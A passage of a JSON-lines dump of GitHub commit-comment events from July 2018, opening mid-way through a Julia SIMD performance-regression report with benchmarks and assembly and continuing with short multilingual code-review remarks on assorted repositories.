Vec{8,Float64}\r\nVec{8,Float64}\r\n\r\njulia> function vadd!(xs::Vector{T}, ys::Vector{T}, ::Type{Vec{N,T}}) where {N,T}\r\n           @assert length(ys) == length(xs)\r\n           @assert length(xs) % N == 0\r\n           @inbounds for i in 1:N:length(xs)\r\n               xv = vload(Vec{N,T}, xs, i)\r\n               yv = vload(Vec{N,T}, ys, i)\r\n               xv += yv\r\n               vstore(xv, xs, i)\r\n           end\r\n       end\r\nvadd! (generic function with 1 method)\r\n\r\njulia> xs = randn(800);\r\n\r\njulia> ys = randn(800);\r\n\r\njulia> @btime vadd!($xs, $ys, V); # Commit 30bf7ac736\r\n  139.569 ns (0 allocations: 0 bytes)\r\n```\r\n```\r\njulia> @btime vadd!($xs, $ys, V); # Commit 9277d3af2d\r\n  253.899 ns (0 allocations: 0 bytes)\r\n```\r\n\r\nLooking at `@code_native` for these examples shows code that looks like this prior to the commit:\r\n```julia\r\n; Location: SIMD.jl:116\r\n\tvbroadcastsd\t768(%rdx,%rsi,8), %zmm28\r\n;}}\r\n; Function fma; {\r\n; Location: SIMD.jl:1010\r\n; Function llvmwrap; {\r\n; Location: SIMD.jl:666\r\n; Function llvmwrap; {\r\n; Location: SIMD.jl:666\r\n; Function macro expansion; {\r\n; Location: SIMD.jl:688\r\n\tvfmadd231pd\t%zmm28, %zmm21, %zmm8\r\n\tvfmadd231pd\t%zmm28, %zmm22, %zmm9\r\n\tvfmadd231pd\t%zmm28, %zmm23, %zmm10\r\n\tvfmadd231pd\t%zmm28, %zmm27, %zmm11\r\n;}}}}\r\n```\r\nvs this after:\r\n```julia\r\n; Location: SIMD.jl:1010\r\n\tleaq\t1216(%rsp), %rdi\r\n\tmovq\t%r14, %rsi\r\n\tmovq\t%r13, %rdx\r\n\tleaq\t3904(%rsp), %r12\r\n\tmovq\t%r12, %rcx\r\n\tleaq\t4672(%rsp), %r8\r\n\tvzeroupper\r\n\tcallq\t*%r15\r\n\tleaq\t1152(%rsp), %rdi\r\n\tmovq\t%r14, %rsi\r\n\tleaq\t512(%rsp), %rdx\r\n\tmovq\t%r12, %rcx\r\n\tleaq\t4608(%rsp), %r8\r\n\tcallq\t*%r15\r\n\tleaq\t1088(%rsp), %rdi\r\n\tmovq\t%r14, %rsi\r\n\tleaq\t256(%rsp), %rdx\r\n\tmovq\t%r12, %rcx\r\n\tleaq\t4544(%rsp), %r8\r\n\tcallq\t*%r15\r\n\tleaq\t1024(%rsp), %rdi\r\n\tmovq\t%r14, %rsi\r\n\tleaq\t448(%rsp), %rdx\r\n\tmovq\t%r12, %rcx\r\n\tleaq\t4480(%rsp), %r8\r\n\tcallq\t*%r15\r\n;}\r\n```\r\nDifference is less extreme in the `vadd!` example.\r\n\r\nLooking at the source code for `SIMD.jl`, it looks like it makes extensive use of `@inline` and `$(Expr(:meta, :inline))` hints, that are now ignored:\r\nhttps://github.com/eschnett/SIMD.jl/blob/master/src/SIMD.jl"}},"created_at":"2018-07-13T14:36:51Z"}
{"id":"7962541350","type":"CommitCommentEvent","actor":{"login":"vkarpov15"},"repo":{"name":"mongodb-js/mongodb-core"},"payload":{"comment":{"id":29700881,"position":null,"line":null,"path":null,"commit_id":"d95a4d15eea9455dff3feea38784bbaed338488d","created_at":"2018-07-13T14:37:06Z","updated_at":"2018-07-13T14:37:06Z","author_association":"MEMBER","body":"At a high level this makes sense and I don't have any ideas how to improve this. Just want to point out that the downstream impact isn't pleasant for people looking to print out their options: https://github.com/Automattic/mongoose/commit/fc76fe4f68ad013fcb7ca117e2539ee971a3679a . "}},"created_at":"2018-07-13T14:37:06Z"}
{"id":"7962544411","type":"CommitCommentEvent","actor":{"login":"leccyril"},"repo":{"name":"tensorflow/models"},"payload":{"comment":{"id":29700889,"position":null,"line":null,"path":null,"commit_id":"e45234e32dbc485f74567f6c0297edc9c084677c","created_at":"2018-07-13T14:37:40Z","updated_at":"2018-07-13T14:37:40Z","author_association":"NONE","body":"i added this configuration but no masks are displayed"}},"created_at":"2018-07-13T14:37:40Z"}
{"id":"7962549627","type":"CommitCommentEvent","actor":{"login":"fire-eggs"},"repo":{"name":"d2phap/ImageGlass"},"payload":{"comment":{"id":29700899,"position":null,"line":null,"path":null,"commit_id":"773516efce7b31cb47472d7aad8c7f894fa66a65","created_at":"2018-07-13T14:38:37Z","updated_at":"2018-07-13T14:38:37Z","author_association":"COLLABORATOR","body":"Okay! \r\n![image](https://user-images.githubusercontent.com/9809727/42697361-e1c938b4-8688-11e8-962b-9e40b6b73450.png)\r\n\r\n"}},"created_at":"2018-07-13T14:38:37Z"}
{"id":"7962550066","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"medeiva/ruby_basics"},"payload":{"comment":{"id":29700900,"position":15,"line":15,"path":"lesson4/route.rb","commit_id":"f48aa84ccb3665fc6ebb8b2846b50c03980f7c58","created_at":"2018-07-13T14:38:41Z","updated_at":"2018-07-13T14:38:41Z","author_association":"NONE","body":"Да. Лучше без селф, если он не нужен. Ну опять же, эти методы не имеют отношения к writerу. Они только читают значение. Вот add_station, пример метода, который не writer и меняет перезаписывает значение инстэнс переменной"}},"created_at":"2018-07-13T14:38:41Z"}
{"id":"7962551527","type":"CommitCommentEvent","actor":{"login":"drzraf"},"repo":{"name":"wp-premium/gravityforms"},"payload":{"comment":{"id":29700901,"position":null,"line":null,"path":null,"commit_id":"42f34c40fc9ee8bff4f716e30ba87149cb33f28e","created_at":"2018-07-13T14:38:57Z","updated_at":"2018-07-13T14:38:57Z","author_association":"NONE","body":"That was a good idea. Any plan to extend this to other repositories?\r\n"}},"created_at":"2018-07-13T14:38:57Z"}
{"id":"7962553332","type":"CommitCommentEvent","actor":{"login":"mkassner"},"repo":{"name":"pupil-labs/pupil"},"payload":{"comment":{"id":29700904,"position":null,"line":null,"path":null,"commit_id":"ce949dd72a72566129c0e873eb5160125a883daf","created_at":"2018-07-13T14:39:17Z","updated_at":"2018-07-13T14:39:17Z","author_association":"MEMBER","body":"re 2. from what I understand then we want scale to be world_t0 world_t1 but the linspace to go from e0 to e1?"}},"created_at":"2018-07-13T14:39:17Z"}
{"id":"7962554425","type":"CommitCommentEvent","actor":{"login":"leenukes"},"repo":{"name":"FOXXL-Hosting/prtg-sensor-last-yum-update"},"payload":{"comment":{"id":29700907,"position":null,"line":null,"path":null,"commit_id":"df8bc24faa83edf8c35f2a42ad744d5d95468f3b","created_at":"2018-07-13T14:39:30Z","updated_at":"2018-07-13T14:39:30Z","author_association":"NONE","body":"Hi,\r\n\r\npossibly a stupid question, but why don't you do this instead which would stop the issue with the username having a capital U (it won't fix if the user itself is Update though)\r\n\r\nLASTUPDATE=`yum history | grep Update | head -n 1 | cut -d'|' -f3`"}},"created_at":"2018-07-13T14:39:30Z"}
{"id":"7962554437","type":"CommitCommentEvent","actor":{"login":"droptablestar"},"repo":{"name":"CodingDojoDallas/mean_july_2018"},"payload":{"comment":{"id":29700908,"position":null,"line":null,"path":null,"commit_id":"1fb2bee194f39bcf23bd592a96bdfe3f69095c3d","created_at":"2018-07-13T14:39:30Z","updated_at":"2018-07-13T14:39:30Z","author_association":"COLLABORATOR","body":"In `bike_oop.js` why is `miles` declared in both the class and the constructor?"}},"created_at":"2018-07-13T14:39:30Z"}
{"id":"7962559549","type":"CommitCommentEvent","actor":{"login":"papr"},"repo":{"name":"pupil-labs/pupil"},"payload":{"comment":{"id":29700920,"position":null,"line":null,"path":null,"commit_id":"ce949dd72a72566129c0e873eb5160125a883daf","created_at":"2018-07-13T14:40:23Z","updated_at":"2018-07-13T14:40:23Z","author_association":"MEMBER","body":"Correct"}},"created_at":"2018-07-13T14:40:23Z"}
{"id":"7962562555","type":"CommitCommentEvent","actor":{"login":"JeffBezanson"},"repo":{"name":"JuliaLang/julia"},"payload":{"comment":{"id":29700924,"position":null,"line":null,"path":null,"commit_id":"9277d3af2dcfc107021989473829a6c9454d83fb","created_at":"2018-07-13T14:40:55Z","updated_at":"2018-07-13T14:40:55Z","author_association":"MEMBER","body":"I'm guessing it's the same issue as #28078?"}},"created_at":"2018-07-13T14:40:55Z"}
{"id":"7962563477","type":"CommitCommentEvent","actor":{"login":"Benjamin-K"},"repo":{"name":"beardcoder/Wegmeister.DatabaseStorage"},"payload":{"comment":{"id":29700927,"position":null,"line":null,"path":null,"commit_id":"2a271b40eea9231e63d7f02f9041db5d4acb27c3","created_at":"2018-07-13T14:41:05Z","updated_at":"2018-07-13T14:41:05Z","author_association":"NONE","body":"Does this work? And how do you set the excluded nodeTypes? Via setting or via formElement definitions?\r\nIf it works, i will possibly add this to the main DatabaseStorage package.\r\nThanks for contributing!"}},"created_at":"2018-07-13T14:41:05Z"}
{"id":"7962564272","type":"CommitCommentEvent","actor":{"login":"cpury"},"repo":{"name":"Privalino/Privalino-Telegram"},"payload":{"comment":{"id":29700928,"position":5,"line":971,"path":"TMessagesProj/src/main/res/values/strings.xml","commit_id":"968bee018f0fe35a76115257d7375bf19c6734ff","created_at":"2018-07-13T14:41:13Z","updated_at":"2018-07-13T14:41:13Z","author_association":"CONTRIBUTOR","body":"Added whitespace?"}},"created_at":"2018-07-13T14:41:13Z"}
{"id":"7962565492","type":"CommitCommentEvent","actor":{"login":"mehulshahnj"},"repo":{"name":"mehulshahnj/gc-blockchain-app"},"payload":{"comment":{"id":29700934,"position":null,"line":null,"path":null,"commit_id":"a5c61899e01fa45ffb1411298f590d22bc68d458","created_at":"2018-07-13T14:41:26Z","updated_at":"2018-07-13T14:41:26Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.ng.bluemix.net/devops/toolchains/3955c280-8a6e-4ed0-b7a5-6f30f95f589d?env_id=ibm%3Ayp%3Aus-south \"gc-blockchain-app\"): [Delivery Pipeline](https://console.ng.bluemix.net/devops/pipelines/90d723e9-1ac3-490d-b08c-83526e6ac856?env_id=ibm%3Ayp%3Aus-south \"gc-blockchain-app\") deployed [gc-blockchain-app](https://github.com/mehulshahnj/gc-blockchain-app/releases/tag/deploy-ibm-yp-us-south-mehul-infinity-services.com-dev-20180713-144125 \"deploy-ibm-yp-us-south-mehul-infinity-services.com-dev-20180713-144125\") to [dev](https://console.bluemix.net/apps/79b143f9-46b6-4f26-9bb6-7cdfce2a9de0?env_id=ibm:yp:us-south \"ibm:yp:us-south:mehul@infinity-services.com:dev\"), including this commit"}},"created_at":"2018-07-13T14:41:26Z"}
{"id":"7962567248","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"medeiva/ruby_basics"},"payload":{"comment":{"id":29700941,"position":11,"line":6,"path":"lesson4/cargoTrain.rb","commit_id":"ce92aff26557d0a34a481c4d59163d0129f50506","created_at":"2018-07-13T14:41:45Z","updated_at":"2018-07-13T14:41:45Z","author_association":"NONE","body":"attach_wagon было подходящим именем. Просто имплементация не совсем то. Попробуй проверить тип тут, и если тип подходящий - отправить \"контроль\" в одноименный метод в супер классе. Если не знаешь, как это сделать посмотри, что делает метод super. В одноименный метод в суперклассе нужно отправить только нужную ему информацию"}},"created_at":"2018-07-13T14:41:45Z"}
{"id":"7962567597","type":"CommitCommentEvent","actor":{"login":"FESTIVALCOINDEV"},"repo":{"name":"FESTIVALCOINDEV/festival"},"payload":{"comment":{"id":29700942,"position":10,"line":132,"path":"src/CryptoNoteConfig.h","commit_id":"8556a4ec2af617d48f311656401a76c50ea07e7e","created_at":"2018-07-13T14:41:49Z","updated_at":"2018-07-13T14:41:49Z","author_association":"OWNER","body":"{38900,    \"1496b733f153076ae3490e9a822d77bcf0f228c5f0f3e09ba7f5aea041f00505\" }"}},"created_at":"2018-07-13T14:41:49Z"}
{"id":"7962570955","type":"CommitCommentEvent","actor":{"login":"jmmccasland"},"repo":{"name":"shouldergiant/prototypal-ember"},"payload":{"comment":{"id":29700946,"position":32,"line":30,"path":"app/templates/blog/article.hbs","commit_id":"705d013331bc342bc79cd7ea45d448160d153e77","created_at":"2018-07-13T14:42:24Z","updated_at":"2018-07-13T14:42:24Z","author_association":"COLLABORATOR","body":"@shouldergiant \r\n\r\nThese spans should be anchor tags linking to ember weekly, embercasts, and the #EmberJS2018 blog post from the ember js blog."}},"created_at":"2018-07-13T14:42:24Z"}
{"id":"7962573516","type":"CommitCommentEvent","actor":{"login":"emord"},"repo":{"name":"dimagi/commcare-hq"},"payload":{"comment":{"id":29700956,"position":4,"line":272,"path":"custom/icds_reports/tasks.py","commit_id":"0d9f3200a8e24f85f6398a10784712dd6f5f9350","created_at":"2018-07-13T14:42:52Z","updated_at":"2018-07-13T14:42:52Z","author_association":"CONTRIBUTOR","body":"should remove"}},"created_at":"2018-07-13T14:42:52Z"}
{"id":"7962574006","type":"CommitCommentEvent","actor":{"login":"jmmccasland"},"repo":{"name":"shouldergiant/prototypal-ember"},"payload":{"comment":{"id":29700959,"position":16,"line":14,"path":"app/templates/blog/article.hbs","commit_id":"705d013331bc342bc79cd7ea45d448160d153e77","created_at":"2018-07-13T14:42:56Z","updated_at":"2018-07-13T14:42:56Z","author_association":"COLLABORATOR","body":"@shouldergiant we can use a blank alt tag here"}},"created_at":"2018-07-13T14:42:56Z"}
{"id":"7962577014","type":"CommitCommentEvent","actor":{"login":"nrayapati"},"repo":{"name":"jenkinsci/jira-steps-plugin"},"payload":{"comment":{"id":29700964,"position":null,"line":null,"path":null,"commit_id":"a2531aa43ed9e9cdd1ffda419a4df28584895b87","created_at":"2018-07-13T14:43:28Z","updated_at":"2018-07-13T14:43:28Z","author_association":"MEMBER","body":"@victor-mendes-eduardo Could you please log a JIRA to [jira-steps-plugin](https://issues.jenkins-ci.org/browse/JENKINS-50764?jql=project%20%3D%20JENKINS%20AND%20status%20in%20(Open%2C%20%22In%20Progress%22%2C%20Reopened)%20AND%20component%20%3D%20%27jira-steps-plugin%27) \r\n\r\nhttps://jenkinsci.github.io/jira-steps-plugin/contributing/"}},"created_at":"2018-07-13T14:43:28Z"}
{"id":"7962577307","type":"CommitCommentEvent","actor":{"login":"myTerminal"},"repo":{"name":"notwaldorf/tiny-care-terminal"},"payload":{"comment":{"id":29700965,"position":3,"line":3,"path":".github/ISSUE_TEMPLATE.md","commit_id":"c1dc753951ddffdaef0ce8440fe018ec612a8470","created_at":"2018-07-13T14:43:32Z","updated_at":"2018-07-13T14:43:32Z","author_association":"NONE","body":"We may still need this line because the next line refers the command as '_it_'.\r\nMay be `npm install -g tiny-care-terminal`?"}},"created_at":"2018-07-13T14:43:32Z"}
{"id":"7962580730","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"medeiva/ruby_basics"},"payload":{"comment":{"id":29700972,"position":6,"line":3,"path":"lesson4/cargoTrain.rb","commit_id":"ce92aff26557d0a34a481c4d59163d0129f50506","created_at":"2018-07-13T14:44:10Z","updated_at":"2018-07-13T14:44:10Z","author_association":"NONE","body":"А зачем тут инстэнс переменная, что изменится, если оставить только символ?"}},"created_at":"2018-07-13T14:44:10Z"}
{"id":"7962584651","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"medeiva/ruby_basics"},"payload":{"comment":{"id":29700982,"position":5,"line":5,"path":"lesson4/cargoWagon.rb","commit_id":"ce92aff26557d0a34a481c4d59163d0129f50506","created_at":"2018-07-13T14:44:51Z","updated_at":"2018-07-13T14:44:51Z","author_association":"NONE","body":"Тоже, что и в cargo_train"}},"created_at":"2018-07-13T14:44:51Z"}
{"id":"7962585489","type":"CommitCommentEvent","actor":{"login":"Liador"},"repo":{"name":"Liador/game-api"},"payload":{"comment":{"id":29700984,"position":4,"line":8,"path":"model/price.go","commit_id":"79dbb81a0bbbef7c605ea05f64c2c7ab67c7a076","created_at":"2018-07-13T14:44:59Z","updated_at":"2018-07-13T14:44:59Z","author_association":"OWNER","body":"le cost, pour moi c'était le prix en argent, mais on peut le considérer comme une ressource aussi. Je ne sais juste pas comment tu te sers de ce price.go, mais je vais regarder."}},"created_at":"2018-07-13T14:44:59Z"}
{"id":"7962586032","type":"CommitCommentEvent","actor":{"login":"jmmccasland"},"repo":{"name":"shouldergiant/prototypal-ember"},"payload":{"comment":{"id":29700986,"position":5,"line":63,"path":"app/styles/elements/_hero.scss","commit_id":"705d013331bc342bc79cd7ea45d448160d153e77","created_at":"2018-07-13T14:45:05Z","updated_at":"2018-07-13T14:45:05Z","author_association":"COLLABORATOR","body":"@shouldergiant instead of the position property, just extend from %accent-circle."}},"created_at":"2018-07-13T14:45:05Z"}
{"id":"7962586218","type":"CommitCommentEvent","actor":{"login":"winex"},"repo":{"name":"ldtteam/minecolonies"},"payload":{"comment":{"id":29700987,"position":null,"line":null,"path":null,"commit_id":"01c15bc3abb6cd96fb3d491504ec5476dca2988d","created_at":"2018-07-13T14:45:07Z","updated_at":"2018-07-13T14:45:07Z","author_association":"NONE","body":"please check for null if gui doesn't have this worker list (workerhutbuilder.xml) to close #2618"}},"created_at":"2018-07-13T14:45:07Z"}
{"id":"7962587889","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"medeiva/ruby_basics"},"payload":{"comment":{"id":29700992,"position":13,"line":9,"path":"lesson4/passengerTrain.rb","commit_id":"ce92aff26557d0a34a481c4d59163d0129f50506","created_at":"2018-07-13T14:45:23Z","updated_at":"2018-07-13T14:45:23Z","author_association":"NONE","body":"смотри  CargoTrain"}},"created_at":"2018-07-13T14:45:23Z"}
{"id":"7962589320","type":"CommitCommentEvent","actor":{"login":"dimosha145"},"repo":{"name":"jshackles/idle_master"},"payload":{"comment":{"id":29700996,"position":null,"line":null,"path":null,"commit_id":"54c29261403d631702aefde4f7cc99057d36d7c5","created_at":"2018-07-13T14:45:38Z","updated_at":"2018-07-13T14:45:38Z","author_association":"NONE","body":"Hello, I checked you created (updated) Idle Master on Total Virus: https://www.virustotal.com/ru/, and I was shown that only 2 of 62 antiviruses have infected viruses and this virus is a miner,\r\nVBA32 TScope.Trojan.MSIL 20180712\r\nAnd one more virus,\r\nTrendMicro-HouseCall Suspicious_GEN.F47V0620 20180712\r\nwhy this utility is infected with a virus !?\r\nAnd I imagine how you on thousands of pc earns with the help of \"VIRUSES\""}},"created_at":"2018-07-13T14:45:38Z"}
{"id":"7962591128","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"medeiva/ruby_basics"},"payload":{"comment":{"id":29701002,"position":6,"line":6,"path":"lesson4/passengerWagon.rb","commit_id":"ce92aff26557d0a34a481c4d59163d0129f50506","created_at":"2018-07-13T14:45:57Z","updated_at":"2018-07-13T14:45:57Z","author_association":"NONE","body":"см CargoWagon"}},"created_at":"2018-07-13T14:45:57Z"}
{"id":"7962591992","type":"CommitCommentEvent","actor":{"login":"chriselrod"},"repo":{"name":"JuliaLang/julia"},"payload":{"comment":{"id":29701004,"position":null,"line":null,"path":null,"commit_id":"9277d3af2dcfc107021989473829a6c9454d83fb","created_at":"2018-07-13T14:46:06Z","updated_at":"2018-07-13T14:46:06Z","author_association":"NONE","body":"Yes, sorry!"}},"created_at":"2018-07-13T14:46:06Z"}
{"id":"7962594817","type":"CommitCommentEvent","actor":{"login":"tmbo"},"repo":{"name":"RasaHQ/rasa_core"},"payload":{"comment":{"id":29701009,"position":5,"line":546,"path":"rasa_core/utils.py","commit_id":"dbe45bdb6b4a7ea4aa1d284aad499045e2f44223","created_at":"2018-07-13T14:46:35Z","updated_at":"2018-07-13T14:46:35Z","author_association":"MEMBER","body":"thanks for spotting :+1:"}},"created_at":"2018-07-13T14:46:35Z"}
{"id":"7962595647","type":"CommitCommentEvent","actor":{"login":"roxma"},"repo":{"name":"ncm2/ncm2"},"payload":{"comment":{"id":29701011,"position":null,"line":null,"path":null,"commit_id":"22d80bc0b93c942eeb07d9c5cbd2ae6927d3cd64","created_at":"2018-07-13T14:46:44Z","updated_at":"2018-07-13T14:46:44Z","author_association":"MEMBER","body":"@clason Please test the latest version"}},"created_at":"2018-07-13T14:46:44Z"}
{"id":"7962601541","type":"CommitCommentEvent","actor":{"login":"MudassirAhmed47"},"repo":{"name":"MudassirAhmed47/sw"},"payload":{"comment":{"id":29701036,"position":null,"line":null,"path":null,"commit_id":"7cbdad9e9e20b244d97d744e9ee728bbc9d9fe00","created_at":"2018-07-13T14:47:48Z","updated_at":"2018-07-13T14:47:48Z","author_association":"OWNER","body":"This is Project is About SW"}},"created_at":"2018-07-13T14:47:48Z"}
{"id":"7962601874","type":"CommitCommentEvent","actor":{"login":"clason"},"repo":{"name":"ncm2/ncm2"},"payload":{"comment":{"id":29701037,"position":null,"line":null,"path":null,"commit_id":"22d80bc0b93c942eeb07d9c5cbd2ae6927d3cd64","created_at":"2018-07-13T14:47:52Z","updated_at":"2018-07-13T14:47:52Z","author_association":"NONE","body":"@roxma That seems to work again, thank you very much!"}},"created_at":"2018-07-13T14:47:52Z"}
{"id":"7962608549","type":"CommitCommentEvent","actor":{"login":"mohitkyadav"},"repo":{"name":"iiitv/Odyssy"},"payload":{"comment":{"id":29701054,"position":2,"line":2,"path":"wsgi/odyssy/basic/static/basic/js/secret.js","commit_id":"9a397e4427ce4b6e13eff9b2f79e55f315864237","created_at":"2018-07-13T14:49:03Z","updated_at":"2018-07-13T14:49:03Z","author_association":"MEMBER","body":"What's so funny? 💢 "}},"created_at":"2018-07-13T14:49:03Z"}
{"id":"7962610051","type":"CommitCommentEvent","actor":{"login":"jean"},"repo":{"name":"surayt/wordcabin"},"payload":{"comment":{"id":29701058,"position":null,"line":null,"path":null,"commit_id":"fd166e43b53563b07901f7e7a67c784cf2cf9644","created_at":"2018-07-13T14:49:19Z","updated_at":"2018-07-13T14:49:19Z","author_association":"NONE","body":"Wrong jean ;-)\n\nOn Fri, 13 Jul 2018, 20:05 J. R. Schmid, <notifications@github.com> wrote:\n\n> Some more changes to exercise editor and view to prepare for @jean to\n> join in the copy & paste fun.\n>\n> --\n> You are receiving this because you were mentioned.\n> Reply to this email directly or view it on GitHub:\n>\n> https://github.com/surayt/wordcabin/commit/fd166e43b53563b07901f7e7a67c784cf2cf9644\n>\n"}},"created_at":"2018-07-13T14:49:19Z"}
{"id":"7962615217","type":"CommitCommentEvent","actor":{"login":"Monal5031"},"repo":{"name":"iiitv/Odyssy"},"payload":{"comment":{"id":29701073,"position":2,"line":2,"path":"wsgi/odyssy/basic/static/basic/js/secret.js","commit_id":"9a397e4427ce4b6e13eff9b2f79e55f315864237","created_at":"2018-07-13T14:50:13Z","updated_at":"2018-07-13T14:50:13Z","author_association":"MEMBER","body":"I'll get back to that after coming from home :p"}},"created_at":"2018-07-13T14:50:13Z"}
{"id":"7962616917","type":"CommitCommentEvent","actor":{"login":"mogoodrich"},"repo":{"name":"openmrs/openmrs-react-components"},"payload":{"comment":{"id":29701076,"position":33,"line":53,"path":"src/domain/Patient.js","commit_id":"0e6d27a24839448e056ec13e7f7782175f5ae9be","created_at":"2018-07-13T14:50:30Z","updated_at":"2018-07-13T14:50:30Z","author_association":"MEMBER","body":"@cioan  Looks like I set up the createFromRestRep method to only pull in identifiers with the flag=preferred?  I'm guessing you changed this because for Malawi they don't use preferred and/or you need the non-preferred one as well.\r\n\r\nIt does make sense to me to have all the non-voided patient identifiers stored, I don't remember 100% why I only picked the preferred ones.  So I'm fine with this change, but can you change the property from patient.preferredIdentifiers to patient.identifiers to make it clear what we are storing?  Thanks!"}},"created_at":"2018-07-13T14:50:30Z"}
{"id":"7962628065","type":"CommitCommentEvent","actor":{"login":"pantheondocs"},"repo":{"name":"pantheon-systems/documentation"},"payload":{"comment":{"id":29701100,"position":null,"line":null,"path":null,"commit_id":"5e582f244f7f872720bafe4c5433e2eeb7ee0386","created_at":"2018-07-13T14:52:24Z","updated_at":"2018-07-13T14:52:24Z","author_association":"NONE","body":"The following doc(s) have been deployed to the [sgreadme](https://sgreadme-static-docs.pantheonsite.io/docs) Multidev environment:\n- [README.md](https://github.com/pantheon-systems/documentation/commit/5e582f244f7f872720bafe4c5433e2eeb7ee0386/README.md)\n"}},"created_at":"2018-07-13T14:52:24Z"}
{"id":"7962631709","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"medeiva/ruby_basics"},"payload":{"comment":{"id":29701107,"position":5,"line":4,"path":"lesson4/train.rb","commit_id":"ce92aff26557d0a34a481c4d59163d0129f50506","created_at":"2018-07-13T14:53:00Z","updated_at":"2018-07-13T14:53:00Z","author_association":"NONE","body":"Смотри, нам нужно в инишалайзе подкласса обратиться к этому инишалайзу, и передать в initialize суперкласса (этот), то, что инишалайзу подкласса пришло в аргументах + тип. Опять-же посмотри в сторону super. Как его можно использовать?"}},"created_at":"2018-07-13T14:53:00Z"}
{"id":"7962634297","type":"CommitCommentEvent","actor":{"login":"chubinou"},"repo":{"name":"Hchnr/VLC-qml2"},"payload":{"comment":{"id":29701114,"position":31,"line":131,"path":"modules/gui/qt/qml/style/VLCStyle.qml","commit_id":"78c45f08631ec941835143aee01742bf8e5eb3f2","created_at":"2018-07-13T14:53:24Z","updated_at":"2018-07-13T14:53:24Z","author_association":"CONTRIBUTOR","body":"^ do you need those ?"}},"created_at":"2018-07-13T14:53:24Z"}
{"id":"7962635038","type":"CommitCommentEvent","actor":{"login":"MSF-Jarvis"},"repo":{"name":"CypherOS/frameworks_base"},"payload":{"comment":{"id":29701116,"position":null,"line":null,"path":null,"commit_id":"d5f249f25fdc40c452f14f1b2bf45ccc335d6ace","created_at":"2018-07-13T14:53:31Z","updated_at":"2018-07-13T14:53:31Z","author_association":"CONTRIBUTOR","body":"So you created a troll account to tagspam us about somebody being smart enough to figure things out on his own? Sounds fun..."}},"created_at":"2018-07-13T14:53:31Z"}
{"id":"7962635421","type":"CommitCommentEvent","actor":{"login":"yottii"},"repo":{"name":"yottii/CTF"},"payload":{"comment":{"id":29701117,"position":null,"line":null,"path":null,"commit_id":"52ed1f5c162bac0211ec5f812df0c43afd6c2c40","created_at":"2018-07-13T14:53:35Z","updated_at":"2018-07-13T14:53:35Z","author_association":"OWNER","body":"up"}},"created_at":"2018-07-13T14:53:35Z"}
{"id":"7962636971","type":"CommitCommentEvent","actor":{"login":"chubinou"},"repo":{"name":"Hchnr/VLC-qml2"},"payload":{"comment":{"id":29701120,"position":46,"line":156,"path":"modules/gui/qt/qml/style/VLCStyle.qml","commit_id":"78c45f08631ec941835143aee01742bf8e5eb3f2","created_at":"2018-07-13T14:53:50Z","updated_at":"2018-07-13T14:53:50Z","author_association":"CONTRIBUTOR","body":"Can you use system palette when possible ?\r\nhttps://doc.qt.io/qt-5.11/qml-palette.html"}},"created_at":"2018-07-13T14:53:50Z"}
{"id":"7962637583","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"medeiva/ruby_basics"},"payload":{"comment":{"id":29701122,"position":20,"line":19,"path":"lesson4/train.rb","commit_id":"ce92aff26557d0a34a481c4d59163d0129f50506","created_at":"2018-07-13T14:53:57Z","updated_at":"2018-07-13T14:53:57Z","author_association":"NONE","body":"Да видимо current_wagon? не самое хорошее название. Я не понимаю, что он должен делать"}},"created_at":"2018-07-13T14:53:57Z"}
{"id":"7962640882","type":"CommitCommentEvent","actor":{"login":"ywelsch"},"repo":{"name":"elastic/elasticsearch"},"payload":{"comment":{"id":29701128,"position":38,"line":67,"path":"server/src/test/java/org/elasticsearch/repositories/blobstore/BlobStoreRepositoryTests.java","commit_id":"8dfa60d218accad78501952d9e1e41e92cb3e4d2","created_at":"2018-07-13T14:54:32Z","updated_at":"2018-07-13T14:54:32Z","author_association":"CONTRIBUTOR","body":"can you add a comment saying why we have this plugin?"}},"created_at":"2018-07-13T14:54:32Z"}
{"id":"7962641295","type":"CommitCommentEvent","actor":{"login":"tdelhomme"},"repo":{"name":"IARCbioinfo/platypus-nf"},"payload":{"comment":{"id":29701130,"position":null,"line":null,"path":null,"commit_id":"5f46879f33f3ea37ac8f848be4fa645178ff76a8","created_at":"2018-07-13T14:54:36Z","updated_at":"2018-07-13T14:54:36Z","author_association":"MEMBER","body":"fixes #19 \r\n[this commit line](https://github.com/IARCbioinfo/platypus-nf/commit/fb5aedf60b543c10ea3a1a3d3dae09c8c53ebd20#diff-0112aa6b1ebe08a77a31dc851c1d5325R120) correct also a bug"}},"created_at":"2018-07-13T14:54:36Z"}
{"id":"7962644583","type":"CommitCommentEvent","actor":{"login":"mkassner"},"repo":{"name":"pupil-labs/pupil"},"payload":{"comment":{"id":29701136,"position":null,"line":null,"path":null,"commit_id":"ce949dd72a72566129c0e873eb5160125a883daf","created_at":"2018-07-13T14:55:10Z","updated_at":"2018-07-13T14:55:10Z","author_association":"MEMBER","body":"ok. I ll fix this then."}},"created_at":"2018-07-13T14:55:10Z"}
{"id":"7962649949","type":"CommitCommentEvent","actor":{"login":"yottii"},"repo":{"name":"yottii/CTF"},"payload":{"comment":{"id":29701148,"position":4,"line":201,"path":"writeup/20180621_googleCTF2018/README.md","commit_id":"52ed1f5c162bac0211ec5f812df0c43afd6c2c40","created_at":"2018-07-13T14:56:03Z","updated_at":"2018-07-13T14:56:03Z","author_association":"OWNER","body":"up"}},"created_at":"2018-07-13T14:56:03Z"}
{"id":"7962659384","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"medeiva/ruby_basics"},"payload":{"comment":{"id":29701165,"position":24,"line":23,"path":"lesson4/train.rb","commit_id":"ce92aff26557d0a34a481c4d59163d0129f50506","created_at":"2018-07-13T14:57:38Z","updated_at":"2018-07-13T14:57:38Z","author_association":"NONE","body":"Поезд - теукщий вагон? А зачем тут аргумент? Не понимаю роль метода"}},"created_at":"2018-07-13T14:57:38Z"}
